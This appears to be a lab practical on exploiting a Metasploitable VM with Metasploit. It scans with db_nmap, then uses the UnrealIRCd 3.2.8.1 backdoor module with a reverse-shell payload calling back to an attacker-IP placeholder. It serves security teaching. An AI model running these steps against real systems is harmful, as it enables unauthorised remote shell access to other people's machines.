Aim: Practical on using Metasploit Framework for exploitation  

kali - bridged without repeat
metasploitable - bridge with repeat + host only on 2nd NAT

Step 1: Initialize Metasploit Database

Initialize and start the Metasploit database service to store scan results.

sudo msfdb init

Step 2: Launch Metasploit Console

Open the Metasploit Framework console.

sudo msfconsole

Step 3: Scan Target Using Nmap via Metasploit

Perform a detailed Nmap scan on the target system and save results in the Metasploit database.

db_nmap -vv -sC -Pn -p- <TARGET_IP> --save

Step 4: View Discovered Services

List all services identified during the scan.

services

Step 5: Search for Vulnerable Service

Search Metasploit modules related to UnrealIRCD.

search unrealircd

Step 6: Select Exploit Module

Use the UnrealIRCD backdoor exploit module.

use exploit/unix/irc/unreal_ircd_3281_backdoor

Step 7: Configure Target Parameters

Set the required exploit options.

set RHOSTS <TARGET_IP>
set RPORT <IRC_PORT>
set LHOST <ATTACKER_IP>
set payload cmd/unix/reverse

Step 8: Execute the Exploit

Run the exploit to gain remote access to the target system.

exploit